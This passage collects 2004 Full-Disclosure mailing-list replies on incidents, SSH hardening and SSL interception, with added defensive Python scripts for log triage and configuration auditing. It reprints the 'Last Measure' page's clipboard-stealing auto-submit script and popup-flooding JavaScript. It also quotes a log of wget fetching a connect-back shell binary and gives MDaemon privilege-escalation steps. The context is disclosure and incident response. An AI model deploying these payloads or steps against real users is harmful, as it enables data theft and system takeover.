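        if len(stamps) < min_requests:
            continue
        stamps.sort()
        mean_gap = (stamps[-1] - stamps[0]) / (len(stamps) - 1)
        if mean_gap <= max_mean_gap:
            flagged[key] = (len(stamps), round(mean_gap, 2))
    return flagged

def constructed_log():
    """Sample log: one desktop fetching a 'spam' site every 2 s for two
    minutes, one normal user. Constructed, not a real access.log."""
    t0 = 1101900000.0
    lines = [f"{t0 + 2 * i:.3f}    120 10.0.0.5 TCP_MISS/200 4123 GET "
             "http://www.spamvertised.test/index.html - DIRECT/203.0.113.5 text/html"
             for i in range(60)]
    lines += [f"{t0 + 40 * i:.3f}    300 10.0.0.9 TCP_MISS/200 9001 GET "
              f"http://www.example.test/{page} - DIRECT/203.0.113.6 text/html"
              for i, page in enumerate(("news", "mail", "wiki"))]
    lines.append(f"{t0 + 5:.3f}   9000 10.0.0.9 TCP_TUNNEL/200 5000 CONNECT "
                 "www.example.test:443 - DIRECT/203.0.113.6 -")
    return lines

if __name__ == "__main__":
    for (client, host), (n, gap) in find_hammering_clients(constructed_log()).items():
        print(f"{client} -> {host}: {n} requests, mean gap {gap}s")
```

The thresholds are the tuning knobs: the screensaver's request rate is what
decides `max_mean_gap`, and `min_requests` only needs to be high enough to
exclude a human holding down F5. Auto-refreshing pages (webmail, stock tickers)
will show up too, so the output is a list to look at, not to act on blindly.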


Re: [Full-Disclosure] Old LS Trojan?

2004-12-01 Thread Kevin Finisterre
You would think a CISSP could write such a script in like 5 minutes.
David S. Morgan wrote:
Hey all,
I am looking for an old LS trojan, with trojan being a misnomer.  Essentially, 
the scenario is that the admin (root) has a . (dot) in his path.  The bad user 
knows this, and has crafted an LS shell script (the part that I can't find) 
that essentially copies /sbin/sh to a hidden directory and then performs some 
suid magic to make the sh run as if they were root, without needing the root 
password.  The file then removes itself and does the real version of ls.
Does anyone remember this one, and have the ls script anywhere?  I would like to use it 
in a demonstration.  I know that this has probably been fixed in various ways, but I have 
old Unixes for just such occasions.
Dave Morgan
David S. Morgan CISSP, CCNP 
aka: [EMAIL PROTECTED]

When the winds of change blow hard enough, even the most tiny object
can become a deadly projectile
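
Added example, not the script David Morgan is asking for: a Python check of the
condition the trick depends on, a "." (or empty, relative, or other-writable)
entry in root's PATH, plus a resolver that shows which file the shell would
actually run. It also covers the case where "." is last in PATH, which still
catches typos. File names, directories and PATH values are constructed.

```python
import os
import posixpath
import stat

def audit_path(path_value, writable_dirs):
    """Entries in a PATH string that let another user plant a command.

    writable_dirs: set of directories known to be writable by other users
    (stat_writable_by_others() below does the real check; the set form keeps
    the example runnable without touching the file system).
    Returns [(index, entry, problem), ...]."""
    findings = []
    for i, entry in enumerate(path_value.split(":")):
        if entry in ("", "."):
            findings.append((i, entry or "(empty)", "current directory is searched"))
        elif not entry.startswith("/"):
            findings.append((i, entry, "relative entry, resolves against cwd"))
        elif entry in writable_dirs:
            findings.append((i, entry, "directory writable by other users"))
    return findings

def stat_writable_by_others(directory):
    """True if `directory` is group- or world-writable and not sticky."""
    mode = os.stat(directory).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH)) and not mode & stat.S_ISVTX

def resolve(cmd, path_value, cwd, existing):
    """Which file does the shell run for `cmd`? Mirrors PATH search order.
    existing: set of executable paths that exist (constructed)."""
    for entry in path_value.split(":"):
        if entry in ("", "."):
            base = cwd
        elif entry.startswith("/"):
            base = entry
        else:
            base = posixpath.join(cwd, entry)
        candidate = posixpath.normpath(posixpath.join(base, cmd))
        if candidate in existing:
            return candidate
    return None

# Constructed scenario: the bad user's home holds a fake "ls" and a fake "sl"
# (for the typo case); the real ls lives in /bin.
FILES = {"/bin/ls", "/home/baduser/ls", "/home/baduser/sl"}

def demo():
    """root runs 'ls' (and once mistypes it as 'sl') from /home/baduser."""
    return {
        "dot_first":     resolve("ls", ".:/usr/bin:/bin", "/home/baduser", FILES),
        "dot_last":      resolve("ls", "/usr/bin:/bin:.", "/home/baduser", FILES),
        "typo_dot_last": resolve("sl", "/usr/bin:/bin:.", "/home/baduser", FILES),
        "no_dot":        resolve("ls", "/usr/bin:/bin", "/home/baduser", FILES),
    }

if __name__ == "__main__":
    for case, path in demo().items():
        print(f"{case:14s} -> {path}")
    for finding in audit_path(".:/usr/bin:/tmp:/bin", {"/tmp"}):
        print("PATH problem:", finding)
```

With "." first, root's `ls` in the bad user's directory runs the planted file,
which is all the trojan needs. Moving "." to the end only narrows the window: a
typo such as `sl` still resolves in the current directory, which is why the
usual advice is to have no "." in root's PATH at all.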


Re: [Full-Disclosure] this is fun?

2004-11-30 Thread Kevin Finisterre
Um yeah... fun.
404 error then to this form which auto submits:
<html><head><title>GNAA Last Measure version 3.4</title></head><body>
<form name="clip" method="post" action="index.php" style="display:none">
<input type="text" name="content">
<input type="hidden" name="send" value="1">
<input type="hidden" name="refer" value="">
<input type="hidden" name="user" value="">
<input type="submit">
</form>
<script language="javascript">
// without this if statement check, it bombs out with an error
if (typeof clipboardData != 'undefined') {
var content = clipboardData.getData("Text");
document.forms["clip"].elements["content"].value = content;
}
document.forms["clip"].submit();
</script>
</body></html>



Then this code:
<html>
<head>
<meta name="generator" content="HTML Tidy for Linux/x86 (vers 1st March 2004), see www.w3.org">
<title>Our lawyer has informed us that we need a warning. So, if
you are under the age of 18 or find this offensive, please leave
immediately</title>
<script language="JavaScript" type="text/javascript">
window.name = 'lastmeasure';
function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, please leave immediately"); }
function delkey() { if (event.keyCode == 46) alert("LAST MEASURE BY PENISBIRD, Rolloffle, and Rucas.\nStarring:\nSpin\nTubgirl\nLemonparty\nBob Goatse\nPenisbird\nPillowfight\nChristmas\nRusty's Wife\nWhat the fuck? That guy's ass is showing in his baby's picture!\n\n\nTotal, complete, all-versions, popup blocker bashing-to-pieces by goat-see\nnhey.swf by rkz\nPROPS TO GNAA.  LOL HY --DiKKy (GNAA NORWAY CORRESPONDANT)"); }

var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;
var goat = 0;
/*
 let's figure out what the fuck kind of browser the poor plebs are using :(
 MSIE gets a special kind of last measure where I start off with a
 ModelessDialog and pop up from it. Gets around google toolbar. -- goat-see */

var nom = navigator.appName.toLowerCase();
var agt = navigator.userAgent.toLowerCase();
var is_major  = parseInt(navigator.appVersion);
var is_minor  = parseFloat(navigator.appVersion);
var is_ie     = (agt.indexOf("msie") != -1);
var is_ie4up  = (is_ie && (is_major >= 4));
var is_nav    = (nom.indexOf('netscape')!=-1);
var is_nav4   = (is_nav && (is_major == 4));
var is_mac    = (agt.indexOf("mac")!=-1);
var is_gecko  = (agt.indexOf('gecko') != -1);
//  GECKO REVISION
var is_rev=0
if (is_gecko) {
temp = agt.split("rv:")
is_rev = parseFloat(temp[1])
}

function procreate(){
if(window.opener) {return 0;} // fuck procreating like rabbits -- goat-see
// sleep(1);
popUp("christmas.php");
popUp("lemonparty.php");
popUp("penisbird.php");
popUp("pillowfight.php");
popUp("tubgirl.php");
popUp("spin.php");
popUp("freak.php");
popUp("rustina.php");
popUp("loopback.php");
popUp("eww.php");
popUp("weightlifter.php");
}
function newXlt(){
xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;
window.focus()}
function newXrt(){
xOff = Math.ceil(7 * Math.random())  * 5 - 10 ;
}
function newYup(){
yOff = Math.ceil( 0 - 6 * Math.random())  * 5 - 10 ;
}
function newYdn(){
yOff = Math.ceil( 7 * Math.random())  * 5 - 10  ;
}
function fOff(){
flagrun = 0;
}
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '_blank', 'toolbar=0,scrollbars=0,location=1,statusbar=0,menubar=0,resizable=0,width=640,height=583');");
}

function playBall(){
xPos += xOff;
yPos += yOff;
if (xPos > screen.width-175){
newXlt();
}
if (xPos < 0){
newXrt();
}
if (yPos > screen.height-100){
newYup();
}
if (yPos < 0){
newYdn();
}
window.moveTo(xPos,yPos);
setTimeout('playBall()',1);
}
</script>
</head>
<body background="hello.jpg" bgcolor="#FF" onmousemove="playBall();" onLoad="playBall();"
leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
<form><input type="submit" value="CLICK ME" name="CLICK ME"
style="width: 2000px; height: 2000px; background-image: url('pooped.jpg');"
src="hello.jpg" height=300 width=300 onmouseover="if(is_ie) {showModelessDialog('procreator.php'); return true; } document.goatse.reset();playBall();return true;"
onclick="if(is_ie) {showModelessDialog('procreator.php'); return true; } playBall();return true;"
onmouseout="if(is_ie) {showModelessDialog('procreator.php'); return true; } else{procreate();} playBall();return true;">
<img src="pooped.jpg" onmouseover="if(is_ie) {showModelessDialog('procreator.php'); return true; } procreate();playBall();return true;"
onmouseout="if(is_ie)

Re: [Full-Disclosure] Is www.sco.com hacked?

2004-11-29 Thread Kevin Finisterre
Would not surprise me...
They STILL use their own vulnerable version of WU ftp server. Even after 
being told multiple times year after year to patch their stuff up. I 
think I will run out of fingers to count the number of individuals @SCO 
or @Caldera that I have told about this...

http://lists.netsys.com/pipermail/full-disclosure/2003-August/008577.html
-KF
Peter Prochaska wrote:
Rossen Naydenov [EMAIL PROTECTED] wrote:

I just noticed the banner on www.sco.com
If you didn't see it (because it has been removed), this is what they say:
"We own all your code
pay us all your money"
Or is it some commercial trick?

Yes it's hacked. Read the text that the woman wrote on the chalkboard :-)


Re: [Full-Disclosure] Privilege escalation flaw in MDaemon 7.2.

2004-11-29 Thread Kevin Finisterre
I discovered and reported this to the vendor over a year ago... the 
vendor did not respond to me either. Now that's service with a smile. =]
-KF

Reed Arvin wrote:
Summary:
A privilege escalation flaw exists in MDaemon 7.2 (http://www.mdaemon.com).
Details:
A privilege escalation technique can be used to gain SYSTEM level
access while interacting with the MDaemon tray icon.
Vulnerable Versions:
MDaemon 7.2
Solutions:
The vendor was notified of the issue. There was no response.
Exploit:
1. Double click on the mail icon in the Taskbar to open the Alt-N
MDaemon Pro window.
2. Click File, click New
3. Notepad should open.  In Notepad click File, click Open
4. In the Files of type: field choose All Files
5. Navigate to %WINDIR%\System32\
6. Right click cmd.exe and choose Open
7. A new command shell will open with SYSTEM privileges
Discovered by Reed Arvin reedarvin[at]gmail[dot]com


Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

2004-10-26 Thread Kevin
On Tue, 26 Oct 2004 16:47:21 +0100, Airey, John [EMAIL PROTECTED] wrote:
 Therefore my point still stands that if someone does possess a mathematical solution 
 to the above, then all bets are off.
 (Whoever it was who disagreed about my statements on encryption, please remember the 
 context of the thread is about SSL security, not one-time keys).

Agreed.  Current SSL standards rely on public key encryption methods
which obtain their strength from the difficulty of the factoring
problem.

 Getting back to the original question, you can't discover if someone is sending RPC 
 over https unless you have a solution to the RSA hard problem above. Nor is it a 
 major security issue if someone is using RPC over https either, unless there are 
 flaws in the implementation of SSL or RPC that could be exploited by someone else.

Yes -- however, there are workarounds.
If you control one end point or the other, then you can take steps to
permit examination of the contents of SSL sessions.

Server:
If you control the server, you can of course load the keys into the
sniffer (risky, but not unheard of, see
http://www.radware.com/content/products/ct100/default.asp) or
terminate the SSL session on a device under your control. (For an
RPC-over-HTTP example, see this document:
http://www.msexchange.org/pages/article_p.asp?id=613)

Client:
If you control the client (say a corporate desktop PC), you have
another option -- you can modify the client's list of trusted CAs, and
force the client to establish the SSL session to your proxy server. 
This gives the proxy an opportunity to inspect/log/modify the
cleartext contents of the session.  The proxy establishes its own SSL
session to the remote server normally; neither the client nor the server
would be aware of the MITM.

A freeware implementation of this MITM approach was Achilles; I have
also seen at least one commercial product offering this functionality
to permit content-scanning of outbound HTTPS browser traffic.

Kevin Kadow



Re: [Full-Disclosure] xpire.info splitinfinity.info - exploits in the wild

2004-10-24 Thread Kevin
On Sun, 24 Oct 2004 13:47:04 +0200, Elia Florio [EMAIL PROTECTED] wrote:
 Hi list,
 i'm doing some analysis on a Linux-Mandrake 9.0 web server
 of a person that was compromised in October.
 In this host now it's installed a special trojan that insert a
 malicious IFRAME tag into every served .PHP page.
. . .
 I've found inside Apache log that the hacker break-in inside the machine
 using an overflow and injecting an executable /tmp/a.out via qmail-inject.

I'm not sure that qmail-inject isn't a red herring?  The actual
download looks like 'wget' was used.

 These are the suspicious log lines :
 
 [Sun Oct  3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
 fault (11)
 [Sun Oct  3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
 fault (11)
 [Sun Oct  3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
 fault (11)
 [Mon Oct  4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
 fault (11)
 qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO
 [EMAIL PROTECTED]
 [Mon Oct  4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
 fault (11)
 [Mon Oct  4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
 fault (11)
 [Tue Oct  5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
 fault (11)
 qmail-inject: fatal: unable to parse this line:
 To: Drugo:[EMAIL PROTECTED]
 sh: -c: option requires an argument
 --15:50:07--  http://xpire.info/cli.gz
   = `/tmp/a.out'
 Resolving xpire.info... fatto.
 Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
 inviata, aspetto la risposta... 200 OK
 Lunghezza: 19,147 [text/plain]
 
0K ..    100% 9.97K
 
 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
 
 [Fri Oct  8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
 fault (11)
 [Sat Oct  9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
 fault (11)
 
 Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
 Linux,
 possible containing a ConnectBack shell. Inside this ELF file you can grep
 these strings:
 
 Usage:  %s host port
 pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
 fork pty, bye!
 Fuck you so
 /bin/sh No connect
 Looking up %s... Failed!
 OK
 %u Connect Back
 
 I don't know if the hacker installs in this machine a rootkit, but the check
 of md5sum of
 ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
 was good...

I assume you used a bootable CD on the infected machine to do the checksums?


 The main problem is finding how the Apache Server (or PHP) was altered by
 the hacker,
 because every user that connects to this host now, could be infected by
 several HTML/IE recent exploits.

Check the httpd.conf (and other apache configuration files) for any
changes, and also the contents of each module loaded.  It's also
possible, but less likely, that the injection is done in a kernel
module.


 Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
 random way??)
 web server inserts a special javascript between HTTP-Header and served page.

Sounds like a good time to replace the entire server with a fresh build.


Kevin

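Added example for the thread above (it is not code from either poster): a small triage script for the kind of Apache error_log quoted in the message. It groups clusters of child segfaults, flags lines that httpd itself never writes (shell errors and wget transcripts that a compromised child's stderr leaves in error_log), lists the files those transcripts say were dropped, and checks binaries against a known-good digest manifest the way Kevin suggests doing from bootable media. The log lines and digests are constructed; SHA-256 is used here rather than the md5sum mentioned in the thread.

```python
"""Triage an Apache error_log that shows signs of compromise.

Added example for the thread above; not code from the original messages.
The sample log lines and the hash manifest are constructed.
"""
import hashlib
import re
from datetime import datetime, timedelta

# httpd's own line, e.g.
# "[Sun Oct  3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11)"
SEGFAULT_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d \d{4})\] "
    r"\[notice\] child pid (?P<pid>\d+) exit signal Segmentation fault"
)

# Lines a child's stderr can leave in error_log that httpd itself never writes.
FOREIGN_PATTERNS = {
    "shell_error": re.compile(r"^sh: "),
    "download_start": re.compile(r"^--\d\d:\d\d:\d\d--\s+(?P<url>\S+)"),
    "download_target": re.compile(r"=> `(?P<path>[^']+)'"),
    "download_done": re.compile(r"- `(?P<path>[^']+)' (saved|salvato)"),
}

# Constructed sample, modelled loosely on the log quoted in the thread.
SAMPLE_ERROR_LOG = """\
[Sun Oct  3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11)
[Sun Oct  3 03:41:52 2004] [notice] child pid 16044 exit signal Segmentation fault (11)
[Sun Oct  3 03:49:07 2004] [notice] child pid 16101 exit signal Segmentation fault (11)
sh: -c: option requires an argument
--03:50:07--  http://dropsite.invalid/cli.gz
           => `/tmp/a.out'
03:50:13 (9.97 KB/s) - `/tmp/a.out' saved [19147/19147]
[Mon Oct  4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation fault (11)
"""


def parse_ts(text):
    """Parse httpd's ctime-style timestamp ("Sun Oct  3 03:35:10 2004")."""
    return datetime.strptime(text, "%a %b %d %H:%M:%S %Y")


def find_segfault_clusters(lines, window=timedelta(minutes=30), min_count=2):
    """Group segfaults whose gap to the previous one is <= window.

    Returns clusters of (timestamp, pid) with at least min_count members;
    isolated crashes are dropped as probable noise.
    """
    events = []
    for line in lines:
        m = SEGFAULT_RE.match(line)
        if m:
            events.append((parse_ts(m["ts"]), int(m["pid"])))
    clusters, current = [], []
    for ev in events:
        if current and ev[0] - current[-1][0] > window:
            if len(current) >= min_count:
                clusters.append(current)
            current = []
        current.append(ev)
    if len(current) >= min_count:
        clusters.append(current)
    return clusters


def foreign_lines(lines):
    """Return (line_no, kind, captured fields) for lines not in httpd's own format."""
    hits = []
    for n, line in enumerate(lines, 1):
        if line.startswith("["):
            continue  # "[date] [level] ..." is httpd's own output
        for kind, pat in FOREIGN_PATTERNS.items():
            m = pat.search(line)
            if m:
                hits.append((n, kind, m.groupdict()))
                break
    return hits


def dropped_files(lines):
    """Paths that download transcripts in the log say were written to disk."""
    paths = {f["path"] for _, kind, f in foreign_lines(lines) if "path" in f}
    return sorted(paths)


def verify_manifest(manifest, read=lambda path: open(path, "rb").read()):
    """Compare files against known-good SHA-256 digests taken from clean install media.

    `read` is injectable so the check can run against an offline image mounted
    from a boot CD (or, in a test, an in-memory stand-in).
    """
    results = {}
    for path, expected in manifest.items():
        try:
            data = read(path)
        except (OSError, KeyError):
            results[path] = "missing"
            continue
        digest = hashlib.sha256(data).hexdigest()
        results[path] = "ok" if digest == expected.lower() else "mismatch"
    return results


if __name__ == "__main__":
    log = SAMPLE_ERROR_LOG.splitlines()
    for cluster in find_segfault_clusters(log):
        print("segfault cluster:", [pid for _, pid in cluster])
    for n, kind, fields in foreign_lines(log):
        print(f"line {n}: {kind} {fields}")
    print("dropped files:", dropped_files(log))
```

The segfault window and minimum count are tunable: a single child crash is routine, three within a few minutes followed by a download transcript is not. The manifest check deliberately takes a reader callback so the same code runs against a mounted image of the suspect disk rather than the live system's possibly trojaned binaries.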


Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts

2004-10-18 Thread Kevin
On Mon, 18 Oct 2004 10:28:39 -0400, Clairmont, Jan M
[EMAIL PROTECTED] wrote:
 Oh yeah and we can trust you bozos not to put in backdoors, sploits and other
 great modes of entry yeah right. 8-, Hire the burglar to secure your home,
 yeah right? Doh!

Just because J.Random Hacker starts out as an immature 17 year old
script kiddie breaking into random systems doesn't mean  (assume he
avoids prison) he can't grow up to become a mature security
professional who knows how to follow a policy procedure, comply with
audit, and work a 9-to-5 job.

Scratch a thirty-something lead InfoSec consultant from any major
consulting firm (including the big four), and chances are you'll find
a 31337 Hax0r from the 90's.

And this is excluding the obvious L0pht-@Stake-Symantec progression.
 People mature over time, grow into a more professional attitude
without losing the inventiveness and insight that makes them
effective.


 Sheessh what a stupid idea?
 
 The whole point of hiring people who don't know much is that they follow
 a policy procedure and comply with audit, I have yet to see a Hck3r follow any
 procedure.  So how do you control anything such as policy etc, the wild west again?
 You hire professional security people to maintain control, not chaos, and find 
 methodologies
 procedures and products that are the most effective, test, re-test, remediate, 
 deploy and defend.
 And that can be maintained and operated by ordinary computer folk, who want to do an 
 honest days
 work and collect their rightful pay, but maybe you never thought of that!

Sure, bean counters have their place too.



Re: [Full-Disclosure] RE: [Full-Disclosure]Open the doors to hell hire a hicker Full-Disclosure Posts

2004-10-18 Thread Kevin
On Mon, 18 Oct 2004 19:25:16 -0400, Micheal Espinola Jr
[EMAIL PROTECTED] wrote:
 Yea, but the l0pht was never an exploit group.  They were the most
 true hackers I have ever personally known.
 
 But it should also be considered that way back then, the youngest
 member was in his teens, while the rest were significantly older than
 him.  Now, that youngest member (Kingpin) should be about 30 y/o.
 
 Their maturity and _responsibility_ to their passions has always kept
 them a cut above in the professional game.

What I was trying to say is that there are other less visible success
stories of hacker turned information security professional, that not
all of the guys who were innovative in the pre-WWW days drifted off to
become old stoner geeks (well, some did), but many actually matured
into responsible adults with a job, a mortgage, and a strong sense of
ethics and self control... and a passion for a good hack.

 On Mon, 18 Oct 2004 17:38:18 -0500, Kevin [EMAIL PROTECTED] wrote:
Scratch a thirty-something lead InfoSec consultant from any major
consulting firm (including the big four), and chances are you'll find
a 31337 Hax0r from the 90's.

And this is excluding the obvious L0pht-@Stake-Symantec progression
 ^^^
Yes,  L0pht a highly visible example,  but not the sole exception to
the rule; there are more than a few individuals who, seeing their name
in an industry journal, the first thing that comes to my mind is not
the respected consulting firm they work for now, but the hacker handle
they used back in the old h/p/v scene.

Kevin



Re: [Full-Disclosure] Any update on SSH brute force attempts?

2004-10-15 Thread Kevin
On Sat, 16 Oct 2004 14:57:31 +1300, James Riden [EMAIL PROTECTED] wrote:
 Jay Libove [EMAIL PROTECTED] writes:
  What are you doing/changing about your SSH configurations to reduce the
  possibility of these attacks finding any kind of hole in the OpenSSH
  software (that's what I run, so that's the only version I'm particularly
  concerned about) ?  Are you doing anything at all?

Use one time passwords (OTP, e.g. S/Key).
Restrict which addresses are allowed to connect (via
/etc/hosts.allow), and/or which user accounts are allowed from which
sources (using AllowUsers in sshd_config).

I prefer to bind the listener to a specific IP address on hosts with
multiple addresses; the BOFH might choose to have a tarpit *:22/TCP
listener on hosts with many alias IPs..


 One or more of the following, depending on local requirements:
 
 * Run on a non-standard port - this will stop brain-dead scanning programs
 * Use key-based auth instead of passwords
 * Restrict what IP addresses are allowed to connect (at your firewall)
 * Disable root logins
 * Use john or crack to audit password strength
 * Use logwatch or similar to monitor failed login attempts
 * Make a honeypot and see what techniques people are trying out
 
 (Everyone's forcing version 2 of the protocol, right?)

$ sudo tail -5 /etc/ssh/sshd_config
Protocol 2
ListenAddress 172.23.97.2
MaxAuthTries 2
PermitRootLogin no
LogLevel VERBOSE
$ exit

I'm sorely tempted to forgo SSH for telnet encapsulated in SSL (via
stunnel), with non-reusable passwords.  Anybody else remember Stel?

Kevin

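Added example, not code from any poster in this thread: an audit of an sshd_config against the points discussed above (protocol 2 only, PermitRootLogin no, a low MaxAuthTries, ListenAddress bound to one address, key-based rather than password authentication, AllowUsers, verbose logging). It applies the first-value-wins rule OpenSSH uses for repeated keywords, so a hardened line appended below an earlier permissive one is reported as ineffective rather than mistaken for a fix. The defaults it assumes for unset keywords are those of an OpenSSH of that era and are marked as assumptions in the code.

```python
"""Audit an sshd_config against the hardening points raised in this thread.

Added example, not code from any poster. Repeated keywords follow the
first-value-wins rule OpenSSH applies, so a hardened line appended below
an earlier permissive one is correctly reported as ineffective.
"""
import re

# Assumed defaults for an OpenSSH of that era (assumption: check
# `man sshd_config` for the version actually installed).
ASSUMED_DEFAULTS = {
    "protocol": "2,1",
    "permitrootlogin": "yes",
    "maxauthtries": "6",
    "passwordauthentication": "yes",
    "loglevel": "INFO",
}
# Keywords that may legitimately appear more than once and accumulate.
MULTI_VALUED = {"listenaddress", "allowusers", "allowgroups", "denyusers", "denygroups"}
VERBOSE_LEVELS = {"VERBOSE", "DEBUG", "DEBUG1", "DEBUG2", "DEBUG3"}

# Constructed sample: the lines Kevin showed plus two from James's list.
HARDENED = """\
Protocol 2
ListenAddress 172.23.97.2
MaxAuthTries 2
PermitRootLogin no
LogLevel VERBOSE
PasswordAuthentication no
AllowUsers kevin@172.23.97.0/24 ops
"""

# Constructed sample of a common mistake: hardened lines appended below the
# stock permissive ones, which sshd ignores because the first value wins.
LOOKS_HARDENED = """\
Protocol 2,1
PermitRootLogin yes
MaxAuthTries 6
# --- "hardening" added later ---
Protocol 2
PermitRootLogin no
MaxAuthTries 2
"""

KEYWORD_RE = re.compile(r"^([A-Za-z0-9]+)\s*(?:=|\s)\s*(.*)$")


def parse_sshd_config(text):
    """Return (first-wins scalar options, accumulated list options, saw_match_block)."""
    scalar, lists, in_match = {}, {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYWORD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            in_match = True  # everything after is conditional; out of scope here
        if in_match:
            continue
        if key in MULTI_VALUED:
            lists.setdefault(key, []).extend(value.split())
        elif key not in scalar:
            scalar[key] = value  # first occurrence wins; later ones are ignored
    return scalar, lists, in_match


def audit_sshd_config(text):
    """Return a list of findings; an empty list means every checked point passes."""
    scalar, lists, has_match = parse_sshd_config(text)

    def get(key):
        return scalar.get(key, ASSUMED_DEFAULTS.get(key, ""))

    findings = []
    if "1" in get("protocol").split(","):
        findings.append("Protocol: SSH-1 still enabled")
    if get("permitrootlogin").lower() == "yes":
        findings.append("PermitRootLogin: direct root logins allowed")
    if int(get("maxauthtries")) > 3:
        findings.append(f"MaxAuthTries: {get('maxauthtries')} attempts per connection")
    if get("passwordauthentication").lower() == "yes":
        findings.append("PasswordAuthentication: reusable passwords accepted")
    if "listenaddress" not in lists:
        findings.append("ListenAddress: listening on every address")
    if not (lists.get("allowusers") or lists.get("allowgroups")):
        findings.append("AllowUsers/AllowGroups: any account may attempt login")
    if get("loglevel").upper() not in VERBOSE_LEVELS:
        findings.append("LogLevel: below VERBOSE, less detail on failed attempts")
    if has_match:
        findings.append("Match block present: conditional settings not audited")
    return findings


if __name__ == "__main__":
    for name, cfg in (("HARDENED", HARDENED), ("LOOKS_HARDENED", LOOKS_HARDENED)):
        print(name, "->", audit_sshd_config(cfg) or "no findings")
```

Run it against `/etc/ssh/sshd_config` by reading the file and passing its text to `audit_sshd_config`; anything inside a Match block is reported as unaudited rather than silently treated as global.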


Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

2004-10-14 Thread Kevin
On Wed, 13 Oct 2004 15:33:13 -0700 (PDT), S G Masood [EMAIL PROTECTED] wrote:
 Yeah, it certainly is a security risk in several ways.
 Decoding and inspecting HTTPS traffic at the perimeter
 before it reaches the server becomes an absolute
 necessity if RPC over HTTPS is implemented. Same with
 RPC over HTTP.

There was a Microsoft employee on-site for a few days this summer, and
I noticed one day that he was reading MS email messages in Outlook
2003 (not OWA) from his laptop while connected to *our* private LAN.

Any smart enterprise blocks all POP/IMAP/MAPI protocols both inbound
and outbound, so this made me more than a bit suspicious...  When I
checked the proxy traffic from the DHCP address assigned to his
laptop, I saw normal-lookup HTTP requests followed by additional RPC
headers.  Turns out the employee he was working with helpfully gave
him the information to use the outbound proxy, and after configuring
proxy settings in the control panel, it just worked.

Our visitor went back to Redmond before I could get approval from
management to modify the firewall configuration to explicitly block
RPC-over-HTTP :(

Kevin

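Added example for this message and for the earlier RPC-over-HTTP thread above (it is code from neither): it picks RPC-over-HTTP sessions out of an outbound proxy log by the RPC_IN_DATA and RPC_OUT_DATA request methods and the /rpc/rpcproxy.dll endpoint, and separately lists CONNECT tunnels, inside which neither the method nor the path is visible to the proxy. The log format and every line in it are constructed for the example.

```python
"""Spot RPC-over-HTTP sessions in an outbound web proxy log.

Added example, not from the original threads. The log lines below are
constructed; the field layout (timestamp, client, method, URL, status)
is an assumption, not any particular proxy's format.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# RPC-over-HTTP indicators: the two request methods the RPC proxy uses,
# and the RpcProxy endpoint path.
RPC_METHODS = {"RPC_IN_DATA", "RPC_OUT_DATA"}
RPC_PATH_RE = re.compile(r"/rpc/rpcproxy\.dll", re.IGNORECASE)

# Constructed sample log.
SAMPLE_PROXY_LOG = """\
2004-07-12T10:14:58 10.20.30.40 GET http://www.example.invalid/ 200
2004-07-12T10:15:01 10.20.30.40 RPC_IN_DATA http://mail.example.invalid/rpc/rpcproxy.dll?mail.example.invalid:6001 200
2004-07-12T10:15:01 10.20.30.40 RPC_OUT_DATA http://mail.example.invalid/rpc/rpcproxy.dll?mail.example.invalid:6001 200
2004-07-12T10:15:09 10.20.30.41 GET http://intranet.example.invalid/news 200
2004-07-12T10:15:12 10.20.30.42 POST http://mail.example.invalid/RPC/RpcProxy.dll?mail.example.invalid:6004 200
2004-07-12T10:15:20 10.20.30.43 CONNECT mail.example.invalid:443 200
"""


def parse_line(line):
    """Split one log line into its five fields; None for malformed lines."""
    parts = line.split(None, 4)
    if len(parts) != 5:
        return None
    ts, client, method, url, status = parts
    return {"ts": ts, "client": client, "method": method, "url": url, "status": status}


def is_rpc_over_http(rec):
    """Return the reason a record looks like RPC over HTTP, or None."""
    if rec["method"].upper() in RPC_METHODS:
        return "method"
    if RPC_PATH_RE.search(urlsplit(rec["url"]).path):
        return "path"
    return None


def find_rpc_clients(text):
    """Map client address -> sorted (destination host, reason) pairs."""
    hits = defaultdict(set)
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        reason = is_rpc_over_http(rec)
        if reason:
            host = urlsplit(rec["url"]).hostname or rec["url"]
            hits[rec["client"]].add((host, reason))
    return {client: sorted(pairs) for client, pairs in hits.items()}


def opaque_tunnels(text):
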